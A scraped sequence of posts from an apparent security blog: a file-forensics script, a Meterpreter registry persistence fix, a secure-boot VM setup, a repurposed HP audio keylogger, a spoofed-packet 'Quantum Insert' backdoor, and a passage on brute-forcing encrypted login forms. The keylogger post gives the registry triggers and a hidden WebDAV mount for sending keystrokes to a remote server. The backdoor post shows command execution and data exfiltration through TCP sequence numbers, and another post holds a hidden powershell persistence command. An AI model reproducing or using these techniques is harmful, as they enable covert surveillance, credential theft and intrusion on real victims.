Since we are going to script it, reducing disk i/o is a must. Most of the data could be retrieved with bash and standard linux tools, but it would greatly slow the process down due to the disk i/o. The speed requirement can be easily achieved by reading all files in manageable chunks and then perform as many of the data extraction operations as possible on each chunk. I choose to implement this in the following way (fiddle with chunk size if you want less disk i/o for each file, avoid reading entire file due to possible memory constraints):

    def chunked_reading(self):
        with open(self.fileloc, 'rb') as f:
            while True:
                chunk = f.read(CHUNKSIZE)
                if chunk != '':
                    yield chunk
                else:
                    break

The above function makes it possible to iterate over each chunk, thus being able to do this:

        for ictr, i in enumerate(self.chunked_reading()):
            if ictr == 0:
                self.magic = magic.from_buffer(i) #comment if no filemagic available

            self.hashfile_update(i)
            self.entropy_bytecount(i)

        self.hashfile_final()
        self.entropy_shannon(filesize)

Pretty cool right? We just need one disk i/o operation to get:

  • Multiple hashes
  • File type, based on the lib-magic library
  • Entropy of the file

The one thing that seems to not be possible, is to retrieve the os.stat output within the same disk i/o operation, which for our script is fine. Coming back to the speed requirement it also means that we can process each file individually and thus operate with multiple processes at once, like so:

def create_workers(filelist_q, output_q, algorithms, amount=get_cpucount()):
    workers = list()
    for ictr, i in enumerate(range(amount)):
        procname = "processfile.%s" % ictr
        p = Process(target=processfile, name=procname, args=(filelist_q, output_q, algorithms))
        p.start()
        workers.append(p)
    return workers

After all the above has been implemented into pmf.py the output looks like this(shortened to keep layout):

dev@devm:~$ sudo python pmf.py /etc/ md5 sha1 | head -n2
“md5″,”sha1″,”path”,”atime”,”mtime”,”ctime”,”size”,”uid”,”gid”,”permissions”,”inode”,”device_id”,”st_blocks”,[…]
“a54ba0d50ae3e0afa0ba4eee3f463f98″,”3544c319406d97a23ca4d10092a6c64963b2d3c0″,”/etc/mtab”,”1470958953.01″,[…]

Like you can see I choose the CSV output format with all the values quoted as the ‘workable’ format. This will hopefully make it easy to convert the output to other formats and work with it on the command-line.

Working with the data, answering questions

Since we now have a script that is able to produce the data which we need, let’s see how we can use this data to answer a couple of example questions. All the work will be done command line to keep it simple, which also results in the benefit that you can reuse the commands with other CSV file based forensic output.

One of the easiest way to work with the CSV format is to use ‘csvtool’, which you can install by running:

sudo apt-get install csvtool

If you want to benefit from the libmagic file type identification of pmf.py you need to install the corresponding python library with pip:

sudo pip install python-magic

We will also need some test data, for this I used the file ”ubuntu-16.04-desktop-amd64.iso’ and mounted it on the ‘mnt’ folder within the following directory structure:

  • ~/
  • ~/test/
  • ~/test/mnt

The command I used was:

sudo mount -o loop,ro,noexec /mnt/hgfs/iso/ubuntu-16.04-desktop-amd64.iso mnt/

After this was done I generated the data with the following commands:

sudo find mnt/ -type f > filelist.txt
sudo python pmf.py mnt/ md5 sha1 > o.txt

It might take a while, but just let it run. If you need to list the guaranteed hashing algorithms by hash lib you can do:

python -c “import hashlib;print hashlib.algorithms”

Now that we’ve setup the data that we’d like to work with, let’s start answering questions.

Converting to body file format (timeline)

One of the goals was to have a somewhat workable format, which means that we should be able to get pretty close the defined body file format as follow:

csvtool -u \| namedcol md5,path,inode,permissions_h,uid,gid,size,atime,mtime,ctime,st_birthtime o.txt

which should output:

csvtool -u \| namedcol md5,path,inode,permissions_h,uid,gid,size,atime,mtime,ctime,st_birthtime o.txt | head
md5|path|inode|permissions_h|uid|gid|size|atime|mtime|ctime|st_birthtime
eb2488189c4e0458885f9ed82282e79a|mnt/README.diskdefines|1325|-r–r–r–|0|0|230|1461191391|1461191315|1461191315|0
d41d8cd98f00b204e9800998ecf8427e|mnt/.disk/base_installable|1414|-r–r–r–|0|0|0|1461191363|1461191316|1461191316|0
09da98c6ddb1686651ef36408882ed47|mnt/.disk/casper-uuid-generic|1418|-r–r–r–|0|0|37|1461191363|1461191353|1461191353|0

Which like you might realise results in the ability to timeline it with mactime, but you loose the extra data that we added.

Finding duplicate hashes

Finding the hashes:

csvtool namedcol md5 o.txt | csvtool drop 1 – | sort -t, -k1,1 | uniq -c | grep -v ‘1 ‘ | sed s/’^ *’//

2 4a4dd3598707603b3f76a2378a4504aa
3 d41d8cd98f00b204e9800998ecf8427e

Displaying the names sorted by size can be done as well by extending the one liner:

for i in $(csvtool namedcol md5 o.txt | csvtool drop 1 – | sort -t, -k1,1 | uniq -c | grep -v ‘1 ‘ | sed s/’^ *’// | cut -d’ ‘ -f2);do grep $i o.txt | csvtool cols 1,7,3 – | sort -t, -k3,3;done

d41d8cd98f00b204e9800998ecf8427e,0,mnt/.disk/base_installable
d41d8cd98f00b204e9800998ecf8427e,0,mnt/isolinux/adtxt.cfg
d41d8cd98f00b204e9800998ecf8427e,0,mnt/isolinux/hi.hlp
4a4dd3598707603b3f76a2378a4504aa,20,mnt/dists/xenial/main/binary-i386/Packages.gz
4a4dd3598707603b3f76a2378a4504aa,20,mnt/dists/xenial/restricted/binary-i386/Packages.gz

Permission issues

csvtool namedcol uid,permissions,path e.txt | csvtool drop 1 – | sort -t, -k2,2 | cut -d, -f2 | uniq -c | sort -b -k1 -n

1 0444
2 0440
13 0664
16 0640
25 0600
213 0755
1380 0644

Or if you want the more human readable output:

csvtool namedcol permissions_h,path e.txt | csvtool drop 1 – | sort -t, -k1,1 | cut -d, -f1 | uniq -c | sort -b -k1 -n

1 -r–r–r–
2 -r–r—–
13 -rw-rw-r–
16 -rw-r—–
25 -rw——-
213 -rwxr-xr-x
1380 -rw-r–r–

With the above output you can now zoom in on files which are world readable or writeable or which are read and write by for example just grepping for the permissions in the original data.

Entropy / file type issues

To create an overview of the files and their entropy you can just do:

csvtool namedcol entropy,path,type o.txt | csvtool drop 1 – | sort -t, -k1,1

0.1104900679412788,mnt/isolinux/boot.cat,”FoxPro FPT, blocks size 0, next free block index 16777216″
0.7708022808463271,mnt/boot/grub/x86_64-efi/legacy_password_test.mod,”ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV)”
1.5567796494470394,mnt/dists/xenial/main/binary-i386/Packages.gz,”gzip compressed data, from Unix, max compression”
1.5567796494470394,mnt/dists/xenial/restricted/binary-i386/Packages.gz,”gzip compressed data, from Unix, max compression”

If you are wondering how this can be useful, if we rerun the same command on pmf.py output on the /etc/ directory we find:

6.020547926192353,/etc/ssl/private/ssl-cert-snakeoil.key,ASCII text

Which due to the ‘.key’ extension is pretty obvious, but without that extension we would not have found that this is in fact a private key. Entropy is a neat little extra piece of information which can help you to find crypto containers, private keys or other high entropy data.

Final thoughts

Just like the title says, this is just an example of how you can perform some poor man’s forensics with self written tools. Even though it isn’t as sophisticated as the professional tools out there you can get a fair amount of work done by just using some rudimentary information and ‘querying’ it in a smart way. If you want to improve the ‘querying’  part you could of course import the data into a Splunk or ELK instance.

Make sure you read and understand the source of the scripts and that you verify and validate the output, like all software they contain bugs ;)

References


Filed under: general, security Tagged: dfir, forensics, mac-robber, mactime, python, timeline

Meterpreter, registry & unicode quirk work around

$
0
0

So this is a quick post with hopefully the goal of saving somebody else some time. Just for the record, I could have missed something totally trivial and I will hopefully get corrected :)

When working with the registry_persistence module, it turns out that one of the registry entries turns into garbage. At first I blamed myself of course, but it turned out that this could probably be a bug in the meterpreter code of which I’m not sure if it really is a bug or if there is a new API call which I haven’t found yet. So when executing the module the registry looks like this:

registry_garbled

Like you can see that’s not exactly how it really should look like, since what we are expecting is something more human readable and an actual powershell command.

The quick work around is to generate the correct string with the correct encoding and for me it was easier to do this with python:

a = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"sleep 1; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:myregkey_name').GetValue('myregkey_value'))))\""
b = '\\x'.join("{:02x}".format(ord(c)) for c in a.encode('UTF-16LE'))
print '\\x' + b

You can then just hard code the output string into the module (replace the original ‘cmd=’ string with your hex encoded one like cmd=”\x25\x00″ etc) and it should appear correctly in your registry. Following screenshot shows before and after:

registry_fixed

If you are curious how you could debug similar bugs yourself, keep on reading for a short tour of the problem solving part. If you are wondering why I don’t submit a PR to metasploit, that’s cause unicode scares the **** out of me. My usual experience is I generate more problems when dealing with unicode than I intended to fix.

Debugging is of course a different process for each person, but one of the ways to learn is to read how other people debug stuff which made me decide to share more of these ‘brain dumps’ in the future.

So a couple of things I tried when I first saw the garbled registry entry, not necessarily in the same chronological order:

  • Run meterpreter on other instances of Windows
  • Check the Windows encoding
  • Read the module source code
  • Edit the module source code to just set one word
  • Lookup the documentation for REG_EXPAND_SZ
    • A null-terminated string that contains unexpanded references to environment variables (for example, “%PATH%”). It will be a Unicode or ANSI string depending on whether you use the Unicode or ANSI functions. To expand the environment variable references, use the ExpandEnvironmentStrings function.
  • Check how the string is actually written into the registry by right clicking and choosing “Modify binary data”
    • Written as ascii
  • Writing a test string to the same registry key with ‘regedit.exe’ and checking how that string is written
    • Surprise it’s UTF16LE, the null bytes after each character gave it away
    • Which explain why it looks so weird, since Windows is trying to display / interpret ‘ascii’ as UTF16LE

So after doing all of the above I realized that our string was passed as ascii to the API and it probably got written to the registry by using a unicode function. Time to dig into the src:

  • First thing I searched for in the metasploit repo was:
    • “def registry_setvaldata”
  • Which brings us to the file and function:
  • Which we can find in the same file
    •  Line 588 shows “session.sys.registry.set_value_direct(root_key, base_key,”
  • Searching for “set_value_direct” brings us to
    • lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
    • Line 231 contains the function and the “TLV” strings give away that this is the part where the command is send to meterpreter. TLV (type, length, value) is the protocol that meterpreter uses.
    • Line 232 contains the funtion we need to search for in the meterpreter git repo
      • stdapi_registry_set_value_direct
  • SWITCH TO METERPRETER GIT REPO
  • Which brings us to c/meterpreter/source/extensions/stdapi/server/sys/registry/registry.c
    • Line 508 contains the next function “set_value” we search for
    • Line 440 contains the actual implementation

The important lines of code and the ones on which I based my conclusion of converting the string to UTF16LE are the following (lines 456 – 473):

	// Get the value data TLV
	if (packet_get_tlv(packet, TLV_TYPE_VALUE_DATA, &valueData) != ERROR_SUCCESS) {
		result = ERROR_INVALID_PARAMETER;
	} else {
		// Now let's rock this shit!
		void *buf;
		size_t len = valueData.header.length;
		if (valueType == REG_SZ) {
			buf = utf8_to_wchar(valueData.buffer);
			len = (wcslen(buf) + 1) * sizeof(wchar_t);
		} else {
			buf = valueData.buffer;
		}
		result = RegSetValueExW(hkey, valueName, 0, valueType, buf, (DWORD)len);
		if (buf != valueData.buffer) {
			free(buf);
		}
	}

The above code retrieves the value we are setting from the TLV packet and then check if the valueType is of the kind “REG_SZ”, which triggers a conversion of the data from UTF8 to Windows wide char (in esssence UTF16LE). If this is not the case then the original data from the packet is NOT converted. However the function used to write the value is always “RegSetValueExW”, which is the unicode variant and thus will always write the content as if it was passed in the correct UTF16LE encoding.

Thus leading to the conclusion that since our registry key type does not fit the ‘conversion’ case and it’s content is directly written by a unicode aware function, we need to pass in the data in the correct format.


Filed under: general, midnight thoughts, security Tagged: metasploit, meterpreter, quirk, unicode, utf16le, workaround

Win10 secure boot inside vmware fusion

$
0
0

Quick blog to remind myself what the correct combination of options are to run Windows 10 Pro x64 with secure boot enabled within VMWare Fusion. Couple of reason why you’d want to do this:

  • Avoid a secondary dedicated laptop
    • Avoid having a physical TPM chip
  • Get familiar with Hyper-V
  • Better understand and research secure boot
  • Get more familiar with memory analysis on hypervisor memory
  • Just for fun

Fusion settings

  • Enable EFI by adding the following to the ‘.vmx’ file
    • firmware = “efi”
  • Enable VT-x/EPT
    • can be found in setting under “Processors & Memory”, “advanced settings”
  • Choose OS type “Hyper-V (unsupported)”

Windows 10 Pro x64 (host) settings

  • Right click on the windows start menu icon and select
    • Programs and Features
      • Turn Windows features on or off
    • Select the Hyper-V role
  • Using the Hyper-V Manager create a “Generation 2” VM
    • In Settings -> Security check the “Enable Trusted Platform Module” checkbox
  • When booting hold down a key or it won’t detect the installation ISO

Windows 10 Pro x64 (guest) settings

  • Right click on the C drive and select “Enable bitlocker”
  • Add a second hard disk and create a folder on it to save the bitlocker recovery key

References

 


Filed under: general Tagged: efi, hyper-v, secure boot, tpm, vmware fusion

Repurposing the HP audio key logger

$
0
0

The last couple of days there has been some fuzz about the HP audio key logger as disclosed by modzero in their blog post and the detailed advisory that they released. The following sentence in their advisory peeked my interest:

This type of debugging turns the audio driver effectively into a keylogging spyware.

With all the hyped ‘repurposing’ of tools that is going on lately I wondered how difficult it actually is to turn this into an intended piece of malware. The reason I find this interesting is because according to different sources it’s legitimate software which has been code-signed correctly and has not been classified as malware by all anti-virus solutions, yet.

https://www.virustotal.com/nl/file/e882149c43976dfadb2746eb2d75a73f0be5aa193623b18b50827f43cce3ed84/analysis/

https://www.virustotal.com/nl/file/c046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8/analysis/

The current detection signatures are also pretty weak since they deem it mostly ‘riskware’  or ‘potentially unwanted application (PUA)’. This could have the side effect that users or administrators might just dismiss any warnings of signs of an attacker abusing the HP audio key logger for malicious purposes.

For red team purposes this is still a nice addition, since it pushes the person analysing this potential incident to really understand what is going on and figuring out that legitimate software is being abused for malicious purposes. Specially since the binary will not be modified and thus the code-signing remains valid (until the certificate is revoked).

Let’s dive into the technical details on the path / approach I followed on repurposing this piece of legitimate software for nefarious red team purposes ;)

I gave myself three goals before I started repurposing the HP audio software:

  • Keep it simple
  • Log all keystrokes remotely
  • Hide where possible

The first action was to get a copy of the exact version of the software as described in the advisory, which luckily for me was a breeze since they linked to the correct location. This is something that more advisories should do, since it makes follow-up research so much easier! Just for reference purpose the download link for the version I used is:

ftp://whp-aus1.cold.extweb.hp.com/pub/softpaq/sp79001-79500/sp79420.exe

The next thing was of course figuring out which files I would be needing to correctly deploy this as malware onto another system. The original install package is a whopping 174MB which is not something you want to install on the targets ;) The starting point was of course the (excellently written) advisory which mentions ‘MicTray64.exe’.

Instead of installing the downloaded installer file I opted for the route in which I just opened the installer with 7-zip and manually browsed the content. This resulted in finding the ‘mictray.exe’ and ‘mictray64.exe’  files in the following locations:

sp79420.exe\\Audio\X86\MicTray.cab\MicTray\MicTray\
sp79420.exe\\Audio\X64\MicTray.cab\MicTray\MicTray\

I extracted the two executables files in the hope that this would be all that I’d need to repurpose them for my goal of using them as an addition to red team operations and good old curiosity for learning purposes. To my surprise I could run them without any errors and the log file as mentioned in the advisory got created in the specified location, this was starting to look good for my first goal of keeping it simple. A small hick-up quickly presented itself however, since no keystrokes were logged.

The advisory mentions registry keys as being some kind of trigger:

If the logfile does not exist or the setting is not yet available in Windows registry, all keystrokes are passed to the OutputDebugString API

To the PROCMON! The trusted tool for attackers and defenders to obtain a first insight into the working of software in many situations. ProcMon looks like this when you start MicTray or MicTray64 and only enable the registry view:

When you repeat the proces a couple of times it becomes clear that MicTray needs the following registry keys to start the actual key logging part. I’m running a 64bit Windows 7, which explain the weird second key, since I run a 32bit MicTray on a 64bit platform, the first key is MicTray64 on a 64bit platform:

HKEY_LOCAL_MACHINE\SOFTWARE\conexant\MicTray\Hotkey

(dword) CustomSettings:1

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Conexant\MicTray\Hotkey

(dword) CustomSettings:1

At this point we have reproduced the original advisory and are able to deploy a single file onto a system, create the correct trigger key and it will start logging keystrokes. A small caveat that I skipped over is the fact that I also run the installer to speed up this process, which resulted in the following pre-populated registry keys (.reg file format) which made it possible to quickly identify the previously described registry keys to trigger the key logging functionality:

[HKEY_CURRENT_USER\Software\Conexant]

[HKEY_CURRENT_USER\Software\Conexant\MicTray.exe]
"J_ERROR"=dword:00000001
"J_WARNING"=dword:00000001
"J_DSOUND"=dword:00000001
"J_DSOUND_V"=dword:00000000
"J_SNDLB"=dword:00000001
"J_DEVICE"=dword:00000001
"J_DEVICE_V"=dword:00000000
"J_ENUM_DEV"=dword:00000001
"J_DRIVER"=dword:00000001
"J_REG"=dword:00000001
"J_IOCTL"=dword:00000001
"J_IOCTL_V"=dword:00000001
"J_NOTIFY"=dword:00000001
"J_NOTIFY_V"=dword:00000000
"J_WINDOWS"=dword:00000001
"J_WMSG"=dword:00000001
"J_KEY"=dword:00000001
"J_FILE"=dword:00000001
"J_LOCK"=dword:00000001
"J_EP_PROPS"=dword:00000001
"J_EP_PROPS_V"=dword:00000000
"J_NODES"=dword:00000001
"J_NODES_V"=dword:00000000
"J_TOPO"=dword:00000001
"J_TOPO_V"=dword:00000001
"J_NODE_ST"=dword:00000001
"J_SRC"=dword:00000001
"J_SRC_V"=dword:00000001
"J_ANGENT"=dword:00000001
"J_STATE"=dword:00000001
"J_CMDLINE"=dword:00000001
"LogName"="C:\Users\Public\MicTray.log"

[HKEY_CURRENT_USER\Software\Conexant\MicTray64.exe]
"J_ERROR"=dword:00000001
"J_WARNING"=dword:00000001
"J_DSOUND"=dword:00000001
"J_DSOUND_V"=dword:00000000
"J_SNDLB"=dword:00000001
"J_DEVICE"=dword:00000001
"J_DEVICE_V"=dword:00000000
"J_ENUM_DEV"=dword:00000001
"J_DRIVER"=dword:00000001
"J_REG"=dword:00000001
"J_IOCTL"=dword:00000001
"J_IOCTL_V"=dword:00000001
"J_NOTIFY"=dword:00000001
"J_NOTIFY_V"=dword:00000000
"J_WINDOWS"=dword:00000001
"J_WMSG"=dword:00000001
"J_KEY"=dword:00000001
"J_FILE"=dword:00000001
"J_LOCK"=dword:00000001
"J_EP_PROPS"=dword:00000001
"J_EP_PROPS_V"=dword:00000000
"J_NODES"=dword:00000001
"J_NODES_V"=dword:00000000
"J_TOPO"=dword:00000001
"J_TOPO_V"=dword:00000001
"J_NODE_ST"=dword:00000001
"J_SRC"=dword:00000001
"J_SRC_V"=dword:00000001
"J_ANGENT"=dword:00000001
"J_STATE"=dword:00000001
"J_CMDLINE"=dword:00000001
"LogName"="C:\Users\Public\MicTray.log"

Now that we have reproduced the behaviour as describes by modzero let’s see how we can receive the keystrokes remotely, after all the registry key ‘LogName’ is a pretty good candidate to achieve this. This first thing that came to mind was WebDav, so I just followed the first google hit on setting up a WebDav server:

https://www.digitalocean.com/community/tutorials/how-to-configure-webdav-access-with-apache-on-ubuntu-14-04

After setting it up, the next challenge was our third goal, attempting to hide whenever possible. This turned out to be pretty straightforward, since you can mount WebDav shares without them showing up in the Windows GUI by using the following command:

net use http://172.16.218.156/webdav/ repurpose /user:alex

By not specifying the drive letter Windows will connect and authenticate, but it will not display a drive letter to the user. Only if the user issues the ‘net use’ command will he be able to see the remotely mounted path. All we have to do now is change the LogName value in the registry to this:

\\172.16.218.156\webdav\omg.log

and all the keystrokes will be send to a remote machine. If you are wondering why WebDav? That’s because it uses normal ports (80, 443), thus enabling us to traverse firewalls more easily and secondly you can apply some TLS protection to the connection, thus preventing prying eyes from seeing that you are exfiltrating keystrokes from their network:

Pretty neat right? We’ve just abused legitimate software to capture and send keystrokes to our remote server, all with the comfort of having the binary correctly code-signed :)

The follow-up steps are of course left as an exercise to the reader ;) which if you are wondering what is left, that would be:

  • Executing the MicTray application on user login
  • Running the MicTray application without it being visible as an tray icon
  • Packing it all neatly into a single executable

Hope you enjoyed it, but more importantly ask yourself the question: How much more legitimate software is out there that could be repurposed as an attack tool?


Filed under: general Tagged: hp, keylogger, procmon, webdav

Quantum Insert: bypassing IP restrictions

$
0
0

By now everyone has probably heard of Quantum Insert NSA style, if you haven’t then I’d recommend to check out some articles at the end of this post. For those who have been around for a while the technique is not new of course and there have been multiple tools in the past that implemented this type of attack. The tools enabled you to for example fully hijack a telnet connection to insert your own commands, terminate existing connections or just generally mess around with the connection. Most of the tools relied on the fact that they could intercept traffic on the local network and then forge the TCP/IP sequence numbers (long gone are the days that you could just predict them).

So it seems this type of attack, in which knowing the sequences numbers aids in forging a spoofed packet, has been used in two very specific manners:

  • Old Skool on local networks to inject into TCP streams
  • NSA style by globally monitoring connections and injecting packets

There is a third option however that hasn’t been explored yet as far as i know, which is using this technique to bypass IP filters for bi-directional communication. You might wonder when this might come in handy right? After all most of the attackers are used to either directly exfiltrate through HTTPS or in a worst case scenario fall back to good old DNS. These methods however don’t cover some of the more isolated hosts that you sometimes encounter during an assignment.

During a couple of assignments I encountered multiple hosts which were shielded by a network firewall only allowing certain IP addresses to or from the box. The following diagram depicts the situation:

As you can see in the above diagram, for some reason the owner of the box had decided that communication with internet was needed, but only to certain IP addresses. This got me thinking on how I could exfiltrate information. The easiest way was of course to exfiltrate the information in the same way that I had obtained access to the box, which was through SSH and password reuse. I didn’t identify any other methods of exfiltration during the assignment. This was of course not the most ideal way out, since it required passing the information through multiple infected hops in the network which could attract some attention from the people in charge of defending the network.

A more elegant way in my opinion would have been to directly exfiltrate from the machine itself and avoid having a continuous connection to the machine from within the network. In this post we are going to explore the solution I found for this challenge, which is to repurpose the well known quantum insert technique to attempt and build a bi-directional communication channel with spoofed IP addresses to be able to exfiltrate from these type of isolated hosts. If you are thinking ‘this only works if IP filtering or anti address spoofing is not enforced’ then you are right. So besides the on going DDOS attacks, this is yet another reason to block outgoing spoofed packets.

If you are already familiar with IP spoofing, forging packets and quantum insert you can also skip the rest of this post and jump directly to QIBA – A quantum insert backdoor POC. Please be aware that I only tested this in a lab setup, no guarantees on real world usage :)

Lastly as you are probably used to by now, the code illustrates the concept and proofs it works, but it’s nowhere near ready for production usage.

The concept

The end goal is pretty clear right? All we want is to be able to obtain bi-directional communication from an isolated host (whitelisted IP addresses, no dns) towards a host on the internet. The following diagram depicts the way we want to achieve this by illustrating one way communication:

Let’s go through the above image and explain some additional details:

  1. Control Connection
    • This is a connection we setup to the whitelisted machine so that we can control the data rate on it and use it to receive injected packets
  2. Leak
    • We leak the the following information
      • ControlConnection source port
      • ControlConnection sequence number
      • ControlConnection acknowledgment number
    • We use SYN packets towards the whitelisted machine with the SPOOFED IP address of our attack server
  3. Receive Leak
    • The whitelisted machine will respond with a SYN/ACK towards our attack server, thus enabling us to receive the leaked information
  4. Inject spoofed packet
    • We now have all the information necessary to send a packet towards our infected machine SPOOFING the IP address of the whitelisted machine

The POC

Before we start building the actual tool let’s first see if the concept is viable by building a small POC which demonstrates the ability to inject data towards an isolated host. This is something that we know is possible since it has been done before, but it doesn’t hurt to replicate it, since it’s the basics for the rest of the tool we want to build.

We need to build the following components:

On the infected host (poc_client.py)

  • A control connection
  • A sniffer
  • A way to leak sequence numbers

On the command & control server (poc_server.py)

  • A way to identify the leaked sequence numbers
  • Something that injects the packets towards our hosts

So this is by no means fully bi-directional, but it provides just enough logic that it should give us enough confidence that the rest of the concept will also work. The first thing to notice is of course that using IP spoofing you can exfiltrate information from an isolated host by encoding it in the sequence number for example, with the downside that it’s a low bandwidth channel of course.

The POC is a bit messy and sometimes doesn’t work, but the points we talked about before are there and demonstrate at least a half-duplex capability of injecting controlled packets towards an isolated host, with the clear potential of evolving into a bi-directional channel. If everything goes alright the control connection should receive the words “INJECT” and “WIPE”. With a bit of imagination you can think of some useful things to do with the POC yourself, for example:

  • Inject new C&C IP address towards an isolated host
  • Initiate a WIPE action of files or hosts
  • Transmit commands to execute

It’s of course more interesting to be able to also receive data in the same way, which would actually enable us to control an isolated host even when it’s fully shielded and is only allowed to talk to one IP address. So let’s try and build a backdoor that works using this principle.

QIBA – A quantum insert backdoor

The POC basically contains everything we need to create a bi-directional backdoor. The reason why is because the following building blocks are present:

  • receive data from an injected packet into the control connection
  • leak data through the seq/ack numbers of the whitelisted host

The main difference is that you need to implement additional signalling and the ability to execute commands as well as cutting the command output into small chunks. Due to the properties of TCP/IP you also have to account for duplicate packets since the TCP/IP stack of the whitelisted IP will resend packets when it receives no answer. To compensate for this you just need to add a small one byte checksum to each packet so that you can recognise it when you receive it. Yes, this does further limit the bandwidth from 4 to 3 bytes, c’est la vie. The one I choose is pretty simple and thus not ideal, but it works for now:

if ((ord(encdata[0]) + ord(encdata[1]) + ord(encdata[2])) % 0xff) == ord(encdata[3]):

Like you can see I just add all the bytes and mod it against 255, which for now seems to be more than enough. Additionally to ensure that I receive all the data in the correct order I implemented some timeouts which seem to do the job just fine. In a more real world implementation you’d implement a more robust signalling protocol as well as some error correcting code. Let’s see how this all looks like:

The server

sudo python qiba_server.py 172.16.218.152 172.16.218.168 8080 "cat /etc/passwd"
Injecting::::::: <IP frag=0 proto=tcp src=172.16.218.152 dst=172.16.218.168 |<TCP sport=http_alt dport=43294 seq=729684595 ack=1783071637 flags=PA |<Raw load='cat /etc/passwd:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' |>>>
.
Sent 1 packets.
cmdoutput::::::: roo
cmdoutput::::::: t:x
cmdoutput::::::: t:x
cmdoutput::::::: :0:
cmdoutput::::::: 0:r
cmdoutput::::::: t:x
cmdoutput::::::: oot
cmdoutput::::::: :/r
cmdoutput::::::: oot
cmdoutput::::::: :/b
cmdoutput::::::: t:x
[...]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologinnc:x:4:65534:sync:/bin:/bin/sync

The client

sudo ./qiba_client.py 172.16.218.152 172.16.218.174 8080
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
Getdata attempt:::::::
RECEIVED::::::: cat /etc/passwd:aaaaaaaaaaaaaa[...]
CMD::::::: cat /etc/passwd
CMD OUTPUT::::::: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]
Exfildata::::::: rooQ
Exfildata enc::::::: 726f6f51
Exfildata int::::::: 1919905617
.
Sent 1 packets.
Exfildata::::::: t:x'
Exfildata enc::::::: 743a7827
Exfildata int::::::: 1949988903
.
Sent 1 packets.
Exfildata::::::: :0:�
Exfildata enc::::::: 3a303aa4
Exfildata int::::::: 976239268

Well that looks like fun right? We are now controlling a host that is only allowed to talk to a single IP using spoofed packets and sequence / acknowledgement numbers as the exfiltration channel.

Restrictions & practical applications

While the QIBA POC proofs that the concept works, there are of course a couple of limitations:

  • The whitelisted host should not implement IP or port whitelists itself
  • The victim should be able to spoof IP addresses
  • The attacker needs to know the IP address of the victims

Which might make you wonder what the practical uses of this concept can be? Well I’d say the following are pretty realistic:

  • proof that an infection has succeeded by notifying the CC regardless of IP whitelist
  • exfiltrate information regardless of IP whitelists

The reason that I deem the above realistic is because the the only thing the infection needs to do is monitor the current connections and attempt to exfiltrate through the IPs it sees. This has of course no guarantee whatsoever, but it’s better then not being able to exfiltrate at all in my opinion :)

References


Filed under: general, midnight thoughts Tagged: exfiltration, nsa, python, quantum insert, scapy, tcp

Brute forcing encrypted web login forms

$
0
0

There are a ton of ways to brute force login forms, you just need to google for it and the first couple of hits will usually do it. That is of course unless you have Burp in which case it will be sufficient for most of the forms out there. Sometimes however it will not be so straight forward and you’ll need to write your own tool(s) for it. This can be for a variety of reasons, but usually it boils down to either a custom protocol over HTTP(S) or some custom encryption of the data entered. In this post we are going to look at two ways of writing these tools:

  • Your own python script
  • A Greasemonkey script

Since to write both tools you first need to understand and analyse the non-default login form let’s do the analysis part first. If you want to follow along you’ll need the following tools:

  • Python
  • Burp free edition
  • Firefox with the Greasemonkey plugin
  • FoxyProxy
  • FireFox developer tools (F12)

Please note that even though we are using some commercially available software as an example, this is NOT a vulnerability in the software itself. Most login forms can be brute forced, some forms slower than others ;) As usual you can also skip the blog post and directly download the python script & the Greasemonkey script. Please keep in mind that they might need to be adjusted for your own needs.

The problem

Sometimes you stumble upon interesting login forms like the one from the Milestone XProtect software. I’ve not performed any configuration of the XProtect software and it seems that it uses the Windows login credentials for authentication on the web form.

Our target will be the ‘Web Client’ part of the software for which you can login with a username and password. If you have configured foxyproxy correctly, then your requests should go through burp before they hit the XProtect login form. Please note that if you are running XProtect on localhost you might need to configure firefox so that it does NOT bypass the proxy settings for localhost, 127.0.0.1.

So when you attempt to login you should see the following two requests in burp:

First login request

Second login request

Now if you attempt to base64 decode the username and password values you end up with gibberish, same goes for the first initial long base64 string in the first request. Additionally it also seems that it needs two requests for every single login. Looks like we’ve found our candidate on which to perform further analysis.

Analysis

First of all let’s look at the data each of the request and response messages.

This is the first request and we can already spot different things that might help us to better understand what type of transformation is happing to our username and password values. The following XML parameters caught my eye:

  • PublicKey
  • EncryptionPadding

This is the response to the first request and just like the first request, the following XML parameters caught my eye:

  • ConnectionId
  • PublicKey

The response contains other interesting information which might even be interpreted as information disclosure, but for our purpose today we’ll just ignore that information.

Now this is the request that actually contains our probably encrypted usernames and password. The only XML parameter that caught my eye was:

  • ConnectionId

The response contains a ‘<Result>’ XML tag which let’s us know if the login was successful or not. Unfortunately not visible on the screenshot since I cut off the bottom half.

Based on the information gathered so far we could draw the following conclusion:

  1. The client sends a public key to the server
  2. The server sends a public key to the client
  3. Magic happens and the credentials are encrypted
    1. Apparently the encryption mode uses ‘ISO10126’ padding

So does the above remind us of anything? YES, of course it does! This seems to be a textbook Diffie Hellman key exchange. The padding mode indicates that the encryption is most probably a block cipher, since if you google for it you’ll find this wikipedia article. We can deduce some more information if we perform some active probing. If we enter a single ‘a’ as a password and then decode the value it will be 16 bytes long. Spaces have been added for clarity:

Input        : a
Base64       : qlqsMXD7uS/Kl15iyIIlxA==
Decoded bytes: aa 5a ac 31 70 fb b9 2f ca 97 5e 62 c8 82 25 c4

If we enter less then 16 ‘a’ characters it remains 16 bytes.

Input        : aaaa aaaa aaaa aaa
Base64       : PIV8H1Rg3KuVi+GyhYsPsg==
Decoded bytes: 3c 85 7c 1f 54 60 dc ab 95 8b e1 b2 85 8b 0f b2

However if we enter 16 ‘a’ characters or more it will result in 32 bytes.

Input        : aaaa aaaa aaaa aaaa a
